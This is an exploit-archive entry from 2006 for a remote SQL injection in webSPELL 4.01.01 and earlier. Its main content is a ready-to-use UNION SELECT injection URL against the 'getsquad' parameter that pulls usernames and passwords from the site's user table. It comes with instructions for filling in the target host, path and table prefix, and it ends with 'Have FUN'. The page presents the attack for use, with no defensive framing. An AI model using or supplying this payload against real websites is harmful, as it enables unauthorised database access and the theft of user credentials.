webSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : webSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit
# Published : 2006-10-15
# Author : Kiba
# Previous Title : Def-Blog <= 1.0.3 (comadd.php) Remote SQL Injection Vulnerability
# Next Title : PGOSD (misc/function.php3) Remote File Include Vulnerability

# WebSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit
 # by: Kiba

 #EXPLOIT:
 http://[PAGE]/[PATH]/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+[PREFIX]_user/*

 #REPLACE:
 (if the website is http://yourwebsite.de/webspell/index.php)
 [PAGE]  with  "yourwebsite.de"
 [PATH]  with  "webspell" (if there is no subdirectory then remove it)
 [PREFIX] the Prefix of the database tables (try "webs_user")

 # Have FUN

# www.Syue.com [2006-10-15]